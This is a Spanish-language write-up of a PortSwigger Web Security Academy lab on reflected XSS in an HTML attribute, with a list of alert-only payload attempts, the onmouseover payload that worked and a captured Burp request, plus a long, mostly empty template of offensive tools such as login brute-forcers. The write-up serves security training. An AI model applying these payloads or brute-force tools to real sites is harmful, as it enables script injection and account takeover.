👨‍🏫WRITEUP RESUMEN

👁️ RECONOCIMIENTO PASIVO ✔️

AUDITORIA DE: ((Laboratorio: XSS reflejado en atributo con corchetes angulares codificados en HTML))

RECONOCIMIENTO PASIVO

BROWSER👈 --------------------------------->https://www.paimon.com.ar/
```
URL:


https://0a6900d60325fb2e82c3ec8200f20038.web-security-academy.net/?search=

HTML INYECTABLE:



<form action="/" method="GET">
                            <input type="text" placeholder="Search the blog..." name="search" value="P4IM0N" onmouseover="javascript:alert('P4IM0N-XSS')<!--&quot;">
                            <button type="submit" class="button">Search</button>
</form>
```
XSSentreCORCHETS_ANGULARES
PAYLOADparaXSSentreCORCHETES_ANGULARES
- CONCLUSION: TUVIMOS QUE IMPLEMENTAR UNA CARGA DEL VALOR P4IM0N PARA QUE SE COMPLETE EN EL VALOR DE VALUE Y CERRAMOS CON " LUEGO PAAR EVITAR EL USO DE CORCHETES ANGULARES(MAYOR Y MEOR QUE), DIRECTAMENTE EJECUTAMOS JAVASCRIPT:ALERT Y LO TERMINAMOS CON UN COMENTARIO POR QUE NOS CARGABA AL ULTIMO UNA CODIFICACION QUE INTERRUMPIA LA EJECUCION DEL PAYLOAD, Y BINGO LO RESOLVIMOS.

🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫🟫

🔬 ANALISIS FORENSE ❌

ANALISIS FORENSE

AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AUTOPSY👈 https://tools.kali.org/forensics/autopsy--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
VOLATILITY👈 https://github.com/volatilityfoundation/volatility--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTK👈 https://www.accessdata.com/products-services/forensic-toolkit-ftk--->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DFF👈 (Digital Forensics Framework) https://github.com/arxsys/dff
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSK👈 (The Sleuth Kit) https://tools.kali.org/forensics/sleuthkit
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
X-WAYS Forensics👈 https://www.x-ways.net/forensics/index-m.html
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FOREMOST👈 https://github.com/korczis/foremost
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HxD👈 https://mh-nexus.de/en/hxd/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HxD👈 https://mh-nexus.de/en/hxd/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
XXD👈 https://tools.kali.org/forensics/xxd
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦🟦

👊 RECONOCIMIENTO ACTIVO ❌

RECONOCIMIENTO ACTIVO

PING👈 --------------------------------->https://www.kali.org/tools/fping/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP👈 --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP👈 --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NMAP👈 --------------------------------->https://nmap.org/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NESSUS👈 --------------------------------->https://es-la.tenable.com/products/nessus/nessus-essentials
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OPENVAS👈 --------------------------------->https://github.com/greenbone/openvas-scanner
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NIKTO👈 --------------------------------->https://github.com/sullo/nikto
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
METASPLOIT👈 --------------------------------->https://www.metasploit.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OWASP ZAP👈 --------------------------------->https://github.com/zaproxy/zaproxy
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIRESHARK👈 --------------------------------->https://github.com/wireshark/wireshark --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRBUSTER👈 --------------------------------->https://github.com/KajanM/DirBuster
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DIRBUSTER👈 --------------------------------->https://github.com/KajanM/DirBuster
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SQLMAP👈 --------------------------------->https://github.com/sqlmapproject/sqlmap --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SQLMAP👈 --------------------------------->https://github.com/sqlmapproject/sqlmap --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WPSCAN👈 --------------------------------->https://wpscan.com/register/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOOMSCAN👈 --------------------------------->https://www.kali.org/tools/joomscan/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOBUSTER👈 --------------------------------->https://www.kali.org/tools/gobuster/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOBUSTER👈 --------------------------------->https://www.kali.org/tools/gobuster/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FFUF👈 --------------------------------->https://www.kali.org/tools/ffuf/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FFUF👈 --------------------------------->https://www.kali.org/tools/ffuf/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TRACEROUTE👈 --------------------------------->https://www.kali.org/tools/traceroute/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBCLIENT👈 --------------------------------->https://www.kali.org/tools/samba/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBCLIENT👈 --------------------------------->https://www.kali.org/tools/samba/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBCLIENT👈 --------------------------------->https://www.kali.org/tools/samba/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TELNET👈 --------------------------------->https://wowgold-seller.com/es/stories/133-how-to-install-and-use-telnet-on-kali-linux
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TELNET👈 --------------------------------->https://wowgold-seller.com/es/stories/133-how-to-install-and-use-telnet-on-kali-linux
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TELNET👈 --------------------------------->https://wowgold-seller.com/es/stories/133-how-to-install-and-use-telnet-on-kali-linux
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH👈 --------------------------------->https://www.kali.org/tools/openssh/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SSH👈 --------------------------------->https://www.kali.org/tools/openssh/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NETCAT👈 --------------------------------->https://www.kali.org/tools/netcat/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTP👈 --------------------------------->https://www.kali.org/tools/netkit-ftp/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTP👈 --------------------------------->https://www.kali.org/tools/netkit-ftp/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FTP👈 --------------------------------->https://www.kali.org/tools/netkit-ftp/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TCPDUMP👈 --------------------------------->https://www.kali.org/tools/tcpdump/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TCPDUMP👈 --------------------------------->https://www.kali.org/tools/tcpdump/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TCPDUMP👈 --------------------------------->https://www.kali.org/tools/tcpdump/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TSHARK👈 --------------------------------->https://www.kali.org/tools/wireshark/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BETTERCAP👈 --------------------------------->https://www.kali.org/tools/bettercap/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBMAP👈 --------------------------------->https://www.kali.org/tools/smbmap/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SMBMAP👈 --------------------------------->https://www.kali.org/tools/smbmap/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WFUZZ👈 --------------------------------->https://www.kali.org/tools/wfuzz/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WFUZZ👈 --------------------------------->https://www.kali.org/tools/wfuzz/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BETTERCAP👈 --------------------------------->https://www.kali.org/tools/bettercap/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMMIX👈 --------------------------------->https://www.kali.org/tools/commix/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMMIX👈 --------------------------------->https://www.kali.org/tools/commix/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SKIP-FISH👈 --------------------------------->https://www.kali.org/tools/skipfish/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WAPITI👈 --------------------------------->https://www.kali.org/tools/wapiti/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ETTERCAP👈 --------------------------------->https://www.kali.org/tools/ettercap/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
WIFITE👈 --------------------------------->https://www.kali.org/tools/wifite/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SPOOFTOOPH👈 --------------------------------->https://www.kali.org/tools/spooftooph/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC👈 --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪🟪

🕵️ INVESTIGACION OSINT ❌

INVESTIGACION OSINT

OSINT Framework👈 --------------------------------->https://osintframework.com/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Maltego👈 --------------------------------->https://www.kali.org/tools/maltego/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Maltego👈 --------------------------------->https://www.kali.org/tools/maltego/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Recon-ng👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
Recon-ng👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
theHarvester👈 --------------------------------->https://www.kali.org/tools/theharvester/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
theHarvester👈 --------------------------------->https://www.kali.org/tools/theharvester/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
GOOGLE DORKS👈 --------------------------------->https://www.google.com/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SHODAN👈 --------------------------------->https://www.shodan.io/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OSRFrameworK👈 --------------------------------->https://www.kali.org/tools/osrframework/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
SN0INT👈 --------------------------------->https://www.kali.org/tools/sn0int/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OSINTGRAM👈 --------------------------------->https://github.com/Datalux/Osintgram
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
TWOSINT👈 --------------------------------->https://github.com/falkensmz/tw1tter0s1nt
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X FACEBOOK👈 --------------------------------->https://intelx.io/tools?tab=facebook
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X PERSONAS👈 --------------------------------->https://intelx.io/tools?tab=person
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X TELEFONOS👈 --------------------------------->https://intelx.io/tools?tab=telephone
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X Ubicación 2 Mapa👈 --------------------------------->https://intelx.io/tools?tab=location
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X IMAGEN👈 --------------------------------->https://intelx.io/tools?tab=image
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X NOMBRE DE USUARIO👈 --------------------------------->https://intelx.io/tools?tab=username
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X HASH INVERSA👈 --------------------------------->https://intelx.io/tools?tab=hash
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X ARCHIVOS👈 --------------------------------->https://intelx.io/tools?tab=file
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
INTELLIGENCE X VIN VEHICULOS👈 --------------------------------->https://intelx.io/tools?tab=vin
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩🟩

⛓️ HASHES Y DESENCRIPTADOS ❌

HASHES Y DESENCRIPTADOS

JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
JOHN THE RIPPER👈 --------------------------------->https://www.kali.org/tools/john/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HASHCAT👈 --------------------------------->https://www.kali.org/tools/hashcat/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
RAINBOWCRACK👈 --------------------------------->https://www.kali.org/tools/rainbowcrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
OPHCRACK👈 --------------------------------->https://www.kali.org/tools/ophcrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKSTATION👈 --------------------------------->https://crackstation.net/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AIRCRACK-NG👈 --------------------------------->https://www.kali.org/tools/aircrack-ng/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
AIRCRACK-NG👈 --------------------------------->https://www.kali.org/tools/aircrack-ng/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CAIN Y ABEL👈 --------------------------------->https://github.com/xchwarze/Cain
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
DAVEGRO1👈 --------------------------------->https://github.com/octomagon/davegrohl
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
ElcomSoft Distributed Password Recovery👈 --------------------------------->https://www.elcomsoft.es/edpr.html
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACK RAR👈 --------------------------------->https://github.com/TermuxHackz/Crack-rar
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACK NINJA RAR👈 --------------------------------->https://github.com/SHUR1K-N/RARNinja-RAR-Password-Cracking-Utility
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCRACK👈 --------------------------------->https://www.kali.org/tools/ncrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CEWL WORDLIST👈 --------------------------------->https://www.kali.org/tools/cewl/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRUNCH WORDLIST👈 --------------------------------->https://www.kali.org/tools/crunch/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
P4Iwordlists👈 --------------------------------->https://paimonhacking.gitbook.io/p4im0n_h4cking/curso-hacking-con-python/generador-de-wordlist-para-fuerza-bruta-p4iwordlist.py-1.2v
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CYBERCHEF👈 --------------------------------->https://gchq.github.io/CyberChef/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BASE64 DECODE👈 --------------------------------->https://www.base64decode.org/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BASE64 DECODE👈 --------------------------------->https://www.base64decode.org/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨🟨

💪 FUERZA BRUTA A LOGINS ❌

FUERZA BRUTA A LOGINS

HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
HYDRA👈 --------------------------------->https://www.kali.org/tools/hydra/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
MEDUSA👈 --------------------------------->https://www.kali.org/tools/medusa/ --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
NCRACK👈 --------------------------------->https://www.kali.org/tools/ncrack/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
161 ONESIXTYONE👈 --------------------------------->https://www.kali.org/tools/onesixtyone/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THC-PPTP-BRUTER👈 --------------------------------->https://www.kali.org/tools/thc-pptp-bruter/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CRACKMAPEXEC👈 --------------------------------->https://www.kali.org/tools/crackmapexec/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
CROWBAR RDP👈 --------------------------------->https://www.kali.org/tools/crowbar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THE CRACKER PDF,ZIP,RAR,LOGIN👈 --------------------------------->https://github.com/XDeadHackerX/The_Cracker
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THC-HYDRA👈 --------------------------------->https://github.com/vanhauser-thc/thc-hydra
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
THC-HYDRA👈 --------------------------------->https://github.com/vanhauser-thc/thc-hydra
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
T14M4T scaneo de servicios en puertos y fuerza bruta automatizado👈 --------------------------------->https://github.com/MS-WEB-BN/t14m4t
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
FACEBOOK-BRUTE-FORCE👈 --------------------------------->https://github.com/likhonsible/Facebook-Brute-Force
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:
COMPLETAR...👈 --------------------------------->https://www.paimon.com.ar/
```
# Espacio para fragmento de código Python -->
```
- CONCLUSION:

🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧🟧

🛠️ SCRIPT DE EXPLOIT Y PAYLOADS ✔️

SCRIPT DE EXPLOIT Y PAYLOADS

NOSOTROS Y CHAT GPT👈 --------------------------------->https://www.paimon.com.ar/

PROBANDO PAYLOADS:



</h1><script>alert('P4IM0N-XSS')</script>



"<script>alert('P4IM0N-XSS')</script>


&quot;</h1><script>alert('P4IM0N-XSS')</script>


"><script>alert('P4IM0N-XSS')</script>


P4IM0N"><script>alert('P4IM0N-XSS')</script>      ------> (CARGO  P4IM0N bien dentro de parametro VALUE)


P4IM0N" onmouseover=<script>alert('P4IM0N-XSS')</script>


P4IM0N" onmouseover=javascript:alert('P4IM0N-XSS')


P4IM0N" onmouseover=javascript:alert('P4IM0N-XSS')<!--



PAYLOAD QUE FUNCIONO:


P4IM0N" onmouseover=javascript:alert('P4IM0N-XSS')<!--

CONCLUSION:DIMOS CON EL PAYLOAD CORRECTO.

🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥🟥

🤯 EXPLOTACION ✔️

EXPLOTACION

BURP SUITE👈 --------------------------------->https://portswigger.net/web-security --->PDF-TOOL

REQUEST NORMAL:



GET /?search=century HTTP/2
Host: 0a6900d60325fb2e82c3ec8200f20038.web-security-academy.net
Cookie: session=KCXh7QYsqFuXFgcuy3GN7h1rUXFmA9Pk
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0a6900d60325fb2e82c3ec8200f20038.web-security-academy.net/
Accept-Encoding: gzip, deflate, br
Accept-Language: es-419,es;q=0.9,en;q=0.8



RESPONSE NORMAL:




HTTP/2 200 OK
Content-Type: text/html; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 3209

<!DOCTYPE html>
<html>
    <head>
        <link href=/resources/labheader/css/academyLabHeader.css rel=stylesheet>
        <link href=/resources/css/labsBlog.css rel=stylesheet>
        <title>Reflected XSS into attribute with angle brackets HTML-encoded</title>
    </head>
    <body>
        <script src="/resources/labheader/js/labHeader.js"></script>
        <div id="academyLabHeader">
            <section class='academyLabBanner'>
                <div class=container>
                    <div class=logo></div>
                        <div class=title-container>
                            <h2>Reflected XSS into attribute with angle brackets HTML-encoded</h2>
                            <a class=link-back href='https://portswigger.net/web-security/cross-site-scripting/contexts/lab-attribute-angle-brackets-html-encoded'>
                                Back&nbsp;to&nbsp;lab&nbsp;description&nbsp;
                                <svg version=1.1 id=Layer_1 xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' x=0px y=0px viewBox='0 0 28 30' enable-background='new 0 0 28 30' xml:space=preserve title=back-arrow>
                                    <g>
                                        <polygon points='1.4,0 0,1.2 12.6,15 0,28.8 1.4,30 15.1,15'></polygon>
                                        <polygon points='14.3,0 12.9,1.2 25.6,15 12.9,28.8 14.3,30 28,15'></polygon>
                                    </g>
                                </svg>
                            </a>
                        </div>
                        <div class='widgetcontainer-lab-status is-notsolved'>
                            <span>LAB</span>
                            <p>Not solved</p>
                            <span class=lab-status-icon></span>
                        </div>
                    </div>
                </div>
            </section>
        </div>
        <div theme="blog">
            <section class="maincontainer">
                <div class="container is-page">
                    <header class="navigation-header">
                        <section class="top-links">
                            <a href=/>Home</a><p>|</p>
                        </section>
                    </header>
                    <header class="notification-header">
                    </header>
                    <section class=blog-header>
                        <h1>0 search results for 'century'</h1>
                        <hr>
                    </section>
                    <section class=search>
                        <form action=/ method=GET>
                            <input type=text placeholder='Search the blog...' name=search value="century">
                            <button type=submit class=button>Search</button>
                        </form>
                    </section>
                    <section class="blog-list no-results">
